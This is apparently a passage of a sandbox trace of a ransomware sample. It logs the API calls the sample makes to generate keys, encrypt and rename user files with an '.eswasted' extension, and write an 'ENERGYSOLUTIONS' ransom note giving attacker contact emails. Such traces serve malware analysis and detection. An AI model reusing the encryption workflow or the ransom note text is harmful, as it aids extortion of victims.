UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.422] CloseHandle (hObject=0xfc) returned 1 [0083.423] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de278 [0083.423] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.423] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2c0 | out: pbBuffer=0x4de2c0) returned 1 [0083.423] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.423] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.424] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.424] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de480 [0083.432] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de278 | out: hHeap=0x4a0000) returned 1 [0083.432] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.432] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GDcg2A6mPuV9AI/FnCsoq/Pm1cHAHJdnmTCN2zGqm1bNWKBCxeIQWsZRS7CqaHr1\r\nxZSZYywwV0ND5I1MRO8MH5ZIBQCOan/O1aXpmrTGvSahWcbS7dFvJ89tvwF9iktf\r\n8OIePaEz92N/nDleI25WxFUZ+8eC8xnjmSq10ruGcOrn/3W5D6r9UPfHjIoYsX+j\r\n/15GksEYmlnx51i3M/EnTNDMMHvml6xPJ1OosVDjH8EOwW6hYuAb/kWJNumf4PJs\r\nEXsepERpqfhPtISzteyKYUV5znOL4pWWXUo9K+ZGmZqcLo4E4d0jJ73dZnWKChkC\r\nQuS3+DITrjXtUZfSTQ8xXrdU5VVt2lfF7JrKHxz8+dnq8c/ZGmuony10UBKr/sb1\r\nj8JsevihttKwY0tXvo3Pge5PNqCGXyWyChseAHfkltC5xJJyTjncnLTA31PNfTN2\r\nNUMIVAEc7IP3szpX7KgJwAGaSXfbhpO0SCo0lpcbTwt8vSoMgf9lcR6rcryLIX1k\r\nddnvQJMkCj80aHqamtKlOH9HnZ0YCovK1kpE/3Nw1HeLGOXg3cubaeISyN8iiDlE\r\nv8GR+VSTenIMG+0RgehLIO6xoHcz9vQggnbTJNYBnO/v5ClqyovqA2YJKECBP/AV\r\nnNh7Lo0u7+SH78TdImHzfn6YUogijTXgvyjYyW+Bwhq=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.433] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de480 | out: hHeap=0x4a0000) returned 1 [0083.433] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.433] SetEndOfFile (hFile=0x100) returned 1 [0083.435] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.435] CloseHandle (hObject=0x100) returned 1 [0083.436] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.436] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fad48 | out: hHeap=0x4a0000) returned 1 [0083.437] _aulldvrm () returned 0x0 [0083.437] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.438] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.438] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.438] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0083.438] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x290) returned 0x4d91a8 [0083.438] lstrcpyW (in: lpString1=0x4d922e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.438] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.438] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.439] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.439] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.440] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.441] SetEndOfFile (hFile=0x100) returned 1 [0083.441] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.441] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.441] lstrcpyW (in: lpString1=0x4d922e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted")) returned 1 [0083.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.eswasted" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.442] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.442] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.442] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.443] CloseHandle (hObject=0xfc) returned 1 [0083.444] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.444] CloseHandle (hObject=0x110) returned 1 [0083.444] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de278 [0083.444] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.445] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2c0 | out: pbBuffer=0x4de2c0) returned 1 [0083.445] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.445] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.446] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.446] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.455] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de480 [0083.455] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de278 | out: hHeap=0x4a0000) returned 1 [0083.455] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.455] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]et4OITZMgqNAJKIBbXLFxI5wfEZdHHknKDpX6ywbMRBrWDU62t0Hio/yvP0v0yWV\r\n3l6vlGnzgSb05EYTtlY8KpZEY1uadlUWgccV88u/G8pQ+oTf6nwNEaVwSCe0dJWV\r\n3GvuzROACb/H4NiOQFuFRA6T5x6xlTEO3u5Vmhmmr9RmN5GpfC/PJQHqUai3wJdk\r\nfRgcXgmSHJnUJcdXunCc4WWzoMPd8nnUjMG/45inHpWh0X2dDXQD4V17RFlTCDBQ\r\nK6aqZToDzoU+0KqDhVOPntKeKXqqAVFbNV7q/j+Plv6EXsos6iK3xL97mtIz3TE0\r\nsOxWnMssPYQHm3PCtJWcu4GPyk4gZRR0kvBq24q7enQNBOPpsLRcCzJlpefgIqZo\r\noHeQAeEAKVtYKeLIKMJMeX0j1R94fR87nSCmY2VP3fRk1kdnLiRSsLcQ5vYRMGlD\r\nz9OZBwWVqCJJIM454UqZzPsSweJk3PzvWsEhERGwIIHMi6yE0MkTRhdjKFGHUHjv\r\nWFF2DQv0CyyKKJ9sSU9Ndwgot0/M2VSgb8yKqGtFr64c3zOwSkHPWehcLHMIwF4G\r\nSW0rNLDTQOb3HM0BAWD0wZHNgeOdWYWyB7moUuuSDEqWCTsSrToRq7xXMxR01t4C\r\n9++JJJfzMNkSmwjHNEJal86FS/FBbfb7ttp0lJ647zm=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.455] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de480 | out: hHeap=0x4a0000) returned 1 [0083.455] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.455] SetEndOfFile (hFile=0x100) returned 1 [0083.492] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.492] CloseHandle (hObject=0x100) returned 1 [0083.492] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.492] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fae28 | out: hHeap=0x4a0000) returned 1 [0083.493] _aulldvrm () returned 0x0 [0083.493] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.493] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.493] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.493] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0083.493] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x252) returned 0x4d91a8 [0083.494] lstrcpyW (in: lpString1=0x4d91f0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.494] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.494] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.494] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.494] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.495] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.496] SetEndOfFile (hFile=0x100) returned 1 [0083.496] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.496] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.496] lstrcpyW (in: lpString1=0x4d91f0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted")) returned 1 [0083.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.eswasted" (normalized: "c:\\users\\default\\ntuser.dat.log1.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.497] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0083.497] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x2e400 [0083.497] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e400) returned 0xb10000 [0083.497] CloseHandle (hObject=0xfc) returned 1 [0083.552] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0083.554] CloseHandle (hObject=0x120) returned 1 [0083.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea2d0 [0083.554] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.555] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea318 | out: pbBuffer=0x4ea318) returned 1 [0083.555] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.555] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.556] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.556] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.564] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea4d8 [0083.564] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea2d0 | out: hHeap=0x4a0000) returned 1 [0083.564] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e0c48 [0083.564] _snwprintf (in: _Dest=0x4e0c48, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ejaY5Xao7b1xR9IjdmLbc/nYZ78QodMxzgyX/e7hB3KM8PJmzOQNocgE7Xj6RwOK\r\nCeWBzG4XKTxMsdz48d4kgD0YPXXR1g59W2HwFC1mEk+F0rIcE6E/v1XFWfzyfesS\r\nxOTFA1gPyOmnECT+D2TZG40dMHeSrWVdUwDDGewlgKMujN0wYKkTjZr1sgJovr5Q\r\nmxpRnQgC6M2itsuqe8sWkU5tdsvilZYCMYW3n55EQjiJ72N7Tp9OaZPMioFC3AHp\r\n+Nx1ikSrTBRNEWBPoqG/2in8t/XDEQR/ncKTIdF8j0sx+2QyiWwByQ04DFqC8eGf\r\naKmA0NsoDNlpV1AMX0v/r1kJmndx9XXF5UO5Q2Wi+Kv4WQ937+8Y7lFRM4h/rk05\r\n8l2m9e0x/dPIgyYTz14UpZmTupsO0VtZ/Hsi79RWYlrX2i7AdpR7y+RfKCr5+M1u\r\nZoMassbkmNk5qCjefUYtF4mNbunZdHMUYLAF7LEGd6ndvIYoNoI4//gKFkJkuWmr\r\nN0EWaJclWKikNq23uTDhbHsF9YTbH1zeWRMBY3EB8Dahvvm82RS9XVP7EJU8fobl\r\n8OYMOSQe1rd36ouslfyW3+yVHVjw4aj+aaU/adH3FoPZLEPe5l1t9iZuB6EC6MX2\r\nIpS7laDgzf0QoATVlDXMzghebtaNIU5u6Gvbb4lreX9=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.564] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea4d8 | out: hHeap=0x4a0000) returned 1 [0083.564] WriteFile (in: hFile=0x100, lpBuffer=0x4e0c48*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e0c48*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.565] SetEndOfFile (hFile=0x100) returned 1 [0083.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0083.567] CloseHandle (hObject=0x100) returned 1 [0083.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.567] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0ba0 | out: hHeap=0x4a0000) returned 1 [0083.567] _aulldvrm () returned 0x0 [0083.567] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.568] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.568] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.568] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0083.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ec) returned 0x4d91a8 [0083.568] lstrcpyW (in: lpString1=0x4d928a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.568] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea2d0 [0083.568] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.568] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea2d0 | out: pbBuffer=0x4ea2d0) returned 1 [0083.568] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.569] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted_info" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.569] WriteFile (in: hFile=0x100, lpBuffer=0x4ea2d0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea2d0*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.570] SetEndOfFile (hFile=0x100) returned 1 [0083.570] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.570] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea2d0 | out: hHeap=0x4a0000) returned 1 [0083.570] lstrcpyW (in: lpString1=0x4d928a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted")) returned 1 [0083.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.eswasted" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.571] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.571] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x80000 [0083.571] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80000) returned 0x12a0000 [0083.571] CloseHandle (hObject=0x120) returned 1 [0083.916] UnmapViewOfFile (lpBaseAddress=0x12a0000) returned 1 [0083.921] CloseHandle (hObject=0xfc) returned 1 [0083.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea250 [0083.921] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.922] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea298 | out: pbBuffer=0x4ea298) returned 1 [0083.922] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.922] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.923] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.923] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea458 [0083.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.931] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0083.931] _snwprintf (in: _Dest=0x4e09f0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 